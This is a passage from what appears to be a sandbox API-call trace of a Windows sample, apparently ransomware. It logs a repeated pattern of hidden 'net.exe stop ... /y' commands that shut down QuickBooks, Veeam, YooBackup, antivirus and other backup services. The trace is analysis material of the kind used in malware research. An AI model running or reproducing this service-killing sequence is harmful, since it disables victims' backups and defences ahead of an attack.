returned 0x0 [0157.559] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.559] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.562] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.565] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.566] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.568] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.568] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.570] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.571] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0177.739] CoUninitialize () Thread: id = 89 os_tid = 0xb88 Thread: id = 99 os_tid = 0x5dc Thread: id = 111 os_tid = 0x8f4 [0087.156] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0087.156] CoGetContextToken (in: pToken=0x5d8f984 | out: pToken=0x5d8f984) returned 0x0 [0087.156] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5d8f9a8 | out: ppvObject=0x5d8f9a8*=0x6ded34) returned 0x0 [0087.157] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x5d8f9d4 | out: pThreadType=0x5d8f9d4*=0) returned 0x0 [0087.157] IUnknown:Release (This=0x6ded34) returned 0x0 [0087.157] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0087.157] CoUninitialize () [0087.211] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.211] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x344, hWritePipe=0x5d8f304*=0x2fc) returned 1 [0087.211] GetCurrentProcess () returned 0xffffffff [0087.211] GetCurrentProcess () returned 0xffffffff [0087.211] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x344, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3a0) returned 1 [0087.211] CloseHandle (hObject=0x344) returned 1 [0087.211] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.211] CoTaskMemAlloc (cb=0x20e) returned 0x73bd20 [0087.211] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x73bd20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0087.211] CoTaskMemFree (pv=0x73bd20) [0087.212] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop QBIDPService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2fc, hStdError=0x0), lpProcessInformation=0x24b0fb0 | out: lpCommandLine="\"net.exe\" stop QBIDPService /y", lpProcessInformation=0x24b0fb0*(hProcess=0x398, hThread=0x344, dwProcessId=0x844, dwThreadId=0x5f4)) returned 1 [0087.216] CloseHandle (hObject=0x2fc) returned 1 [0087.216] GetFileType (hFile=0x3a0) returned 0x3 [0087.217] CloseHandle (hObject=0x344) returned 1 [0087.217] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.217] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x344, hWritePipe=0x5d8f304*=0x2fc) returned 1 [0087.217] GetCurrentProcess () returned 0xffffffff [0087.217] GetCurrentProcess () returned 0xffffffff [0087.217] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x344, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3b4) returned 1 [0087.217] CloseHandle (hObject=0x344) returned 1 [0087.217] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.217] CoTaskMemAlloc (cb=0x20e) returned 0x73bd20 [0087.217] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x73bd20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0087.218] CoTaskMemFree (pv=0x73bd20) [0087.218] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop Intuit.QuickBooks.FCS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f240*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2fc, hStdError=0x0), lpProcessInformation=0x24bb6c8 | out: lpCommandLine="\"net.exe\" stop Intuit.QuickBooks.FCS /y", lpProcessInformation=0x24bb6c8*(hProcess=0x3ac, hThread=0x344, dwProcessId=0x72c, dwThreadId=0x748)) returned 1 [0087.223] CloseHandle (hObject=0x2fc) returned 1 [0087.223] GetFileType (hFile=0x3b4) returned 0x3 [0087.223] CloseHandle (hObject=0x344) returned 1 [0087.223] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.223] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x344, hWritePipe=0x5d8f304*=0x2fc) returned 1 [0087.223] GetCurrentProcess () returned 0xffffffff [0087.224] GetCurrentProcess () returned 0xffffffff [0087.224] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x344, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3c4) returned 1 [0087.224] CloseHandle (hObject=0x344) returned 1 [0087.224] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.224] CoTaskMemAlloc (cb=0x20e) returned 0x733bb0 [0087.224] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733bb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0087.224] CoTaskMemFree (pv=0x733bb0) [0087.224] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop QBCFMonitorService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f248*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2fc, hStdError=0x0), lpProcessInformation=0x24bef90 | out: lpCommandLine="\"net.exe\" stop QBCFMonitorService /y", lpProcessInformation=0x24bef90*(hProcess=0x3bc, hThread=0x344, dwProcessId=0x90, dwThreadId=0x7c8)) returned 1 [0087.229] CloseHandle (hObject=0x2fc) returned 1 [0087.229] GetFileType (hFile=0x3c4) returned 0x3 [0087.229] CloseHandle (hObject=0x344) returned 1 [0087.229] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.229] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x344, hWritePipe=0x5d8f304*=0x2fc) returned 1 [0087.229] GetCurrentProcess () returned 0xffffffff [0087.229] GetCurrentProcess () returned 0xffffffff [0087.229] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x344, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3f0) returned 1 [0087.230] CloseHandle (hObject=0x344) returned 1 [0087.230] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.230] CoTaskMemAlloc (cb=0x20e) returned 0x733bb0 [0087.230] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733bb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0087.230] CoTaskMemFree (pv=0x733bb0) [0087.230] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop YooBackup /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2fc, hStdError=0x0), lpProcessInformation=0x24c284c | out: lpCommandLine="\"net.exe\" stop YooBackup /y", lpProcessInformation=0x24c284c*(hProcess=0x3cc, hThread=0x344, dwProcessId=0x624, dwThreadId=0xb40)) returned 1 [0087.253] CloseHandle (hObject=0x2fc) returned 1 [0087.253] GetFileType (hFile=0x3f0) returned 0x3 [0087.253] CloseHandle (hObject=0x344) returned 1 [0087.253] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.253] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x344, hWritePipe=0x5d8f304*=0x2fc) returned 1 [0087.253] GetCurrentProcess () returned 0xffffffff [0087.253] GetCurrentProcess () returned 0xffffffff [0087.253] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x344, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3f8) returned 1 [0087.253] CloseHandle (hObject=0x344) returned 1 [0087.253] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.254] CoTaskMemAlloc (cb=0x20e) returned 0x733bb0 [0087.254] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733bb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0087.254] CoTaskMemFree (pv=0x733bb0) [0087.254] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop YooIT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2fc, hStdError=0x0), lpProcessInformation=0x24c60fc | out: lpCommandLine="\"net.exe\" stop YooIT /y", lpProcessInformation=0x24c60fc*(hProcess=0x3f4, hThread=0x344, dwProcessId=0x834, dwThreadId=0xc04)) returned 1 [0087.259] CloseHandle (hObject=0x2fc) returned 1 [0087.259] GetFileType (hFile=0x3f8) returned 0x3 [0087.259] CloseHandle (hObject=0x344) returned 1 [0087.259] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.259] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x344, hWritePipe=0x5d8f304*=0x2fc) returned 1 [0087.259] GetCurrentProcess () returned 0xffffffff [0087.259] GetCurrentProcess () returned 0xffffffff [0087.259] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x344, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x404) returned 1 [0087.259] CloseHandle (hObject=0x344) returned 1 [0087.260] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.260] CoTaskMemAlloc (cb=0x20e) returned 0x733bb0 [0087.260] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733bb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0087.260] CoTaskMemFree (pv=0x733bb0) [0087.260] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop zhudongfangyu /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2fc, hStdError=0x0), lpProcessInformation=0x24c99ac | out: lpCommandLine="\"net.exe\" stop zhudongfangyu /y", lpProcessInformation=0x24c99ac*(hProcess=0x3fc, hThread=0x344, dwProcessId=0xc08, dwThreadId=0xc0c)) returned 1 [0087.584] CloseHandle (hObject=0x2fc) returned 1 [0087.590] GetFileType (hFile=0x404) returned 0x3 [0087.590] CloseHandle (hObject=0x344) returned 1 [0088.067] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0088.068] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x2fc, hWritePipe=0x5d8f304*=0x40c) returned 1 [0088.068] GetCurrentProcess () returned 0xffffffff [0088.068] GetCurrentProcess () returned 0xffffffff [0088.068] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x41c) returned 1 [0088.068] CloseHandle (hObject=0x2fc) returned 1 [0088.068] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0088.068] CoTaskMemAlloc (cb=0x20e) returned 0x733bb0 [0088.068] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733bb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0088.068] CoTaskMemFree (pv=0x733bb0) [0088.068] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop stc_raw_agent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x40c, hStdError=0x0), lpProcessInformation=0x24cd79c | out: lpCommandLine="\"net.exe\" stop stc_raw_agent /y", lpProcessInformation=0x24cd79c*(hProcess=0x344, hThread=0x2fc, dwProcessId=0xc70, dwThreadId=0xc74)) returned 1 [0088.231] CloseHandle (hObject=0x40c) returned 1 [0088.231] GetFileType (hFile=0x41c) returned 0x3 [0088.231] CloseHandle (hObject=0x2fc) returned 1 [0089.014] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0089.014] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x2fc, hWritePipe=0x5d8f304*=0x40c) returned 1 [0089.014] GetCurrentProcess () returned 0xffffffff [0089.014] GetCurrentProcess () returned 0xffffffff [0089.014] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x438) returned 1 [0089.014] CloseHandle (hObject=0x2fc) returned 1 [0089.014] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0089.014] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0089.014] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0089.014] CoTaskMemFree (pv=0x741d20) [0089.014] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VSNAPVSS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x40c, hStdError=0x0), lpProcessInformation=0x24d7d24 | out: lpCommandLine="\"net.exe\" stop VSNAPVSS /y", lpProcessInformation=0x24d7d24*(hProcess=0x434, hThread=0x2fc, dwProcessId=0xcd0, dwThreadId=0xcd4)) returned 1 [0090.301] CloseHandle (hObject=0x40c) returned 1 [0090.301] GetFileType (hFile=0x438) returned 0x3 [0090.301] CloseHandle (hObject=0x2fc) returned 1 [0092.172] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0092.172] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x40c, hWritePipe=0x5d8f304*=0x448) returned 1 [0092.172] GetCurrentProcess () returned 0xffffffff [0092.172] GetCurrentProcess () returned 0xffffffff [0092.172] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x37c) returned 1 [0092.173] CloseHandle (hObject=0x40c) returned 1 [0092.173] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0092.173] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0092.173] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0092.173] CoTaskMemFree (pv=0x741d20) [0092.173] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamTransportSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f248*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x227118c | out: lpCommandLine="\"net.exe\" stop VeeamTransportSvc /y", lpProcessInformation=0x227118c*(hProcess=0x3e0, hThread=0x40c, dwProcessId=0xd24, dwThreadId=0xd28)) returned 1 [0092.475] CloseHandle (hObject=0x448) returned 1 [0092.476] GetFileType (hFile=0x37c) returned 0x3 [0092.476] CloseHandle (hObject=0x40c) returned 1 [0092.902] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0092.902] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x40c, hWritePipe=0x5d8f304*=0x448) returned 1 [0092.902] GetCurrentProcess () returned 0xffffffff [0092.902] GetCurrentProcess () returned 0xffffffff [0092.902] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x2f8) returned 1 [0092.902] CloseHandle (hObject=0x40c) returned 1 [0092.902] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0092.902] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0092.902] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0092.903] CoTaskMemFree (pv=0x741d20) [0092.903] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamDeploymentService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f240*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2498838 | out: lpCommandLine="\"net.exe\" stop VeeamDeploymentService /y", lpProcessInformation=0x2498838*(hProcess=0x398, hThread=0x3c8, dwProcessId=0xd64, dwThreadId=0xd68)) returned 1 [0093.972] CloseHandle (hObject=0x448) returned 1 [0093.972] GetFileType (hFile=0x2f8) returned 0x3 [0093.972] CloseHandle (hObject=0x3c8) returned 1 [0095.493] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0095.493] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x3c8, hWritePipe=0x5d8f304*=0x448) returned 1 [0095.494] GetCurrentProcess () returned 0xffffffff [0095.494] GetCurrentProcess () returned 0xffffffff [0095.494] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x434) returned 1 [0095.494] CloseHandle (hObject=0x3c8) returned 1 [0095.494] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0095.494] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0095.494] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0095.494] CoTaskMemFree (pv=0x741d20) [0095.494] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamNFSSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24a371c | out: lpCommandLine="\"net.exe\" stop VeeamNFSSvc /y", lpProcessInformation=0x24a371c*(hProcess=0x2f0, hThread=0x3c8, dwProcessId=0xe20, dwThreadId=0xe24)) returned 1 [0095.529] CloseHandle (hObject=0x448) returned 1 [0095.529] GetFileType (hFile=0x434) returned 0x3 [0095.529] CloseHandle (hObject=0x3c8) returned 1 [0095.759] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0095.759] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x3c8, hWritePipe=0x5d8f304*=0x448) returned 1 [0095.760] GetCurrentProcess () returned 0xffffffff [0095.760] GetCurrentProcess () returned 0xffffffff [0095.760] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3b8) returned 1 [0095.760] CloseHandle (hObject=0x3c8) returned 1 [0095.760] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0095.760] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0095.760] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0095.760] CoTaskMemFree (pv=0x741d20) [0095.760] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop veeam /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24b1cf4 | out: lpCommandLine="\"net.exe\" stop veeam /y", lpProcessInformation=0x24b1cf4*(hProcess=0x38c, hThread=0x3c8, dwProcessId=0xe64, dwThreadId=0xe68)) returned 1 [0095.777] CloseHandle (hObject=0x448) returned 1 [0095.777] 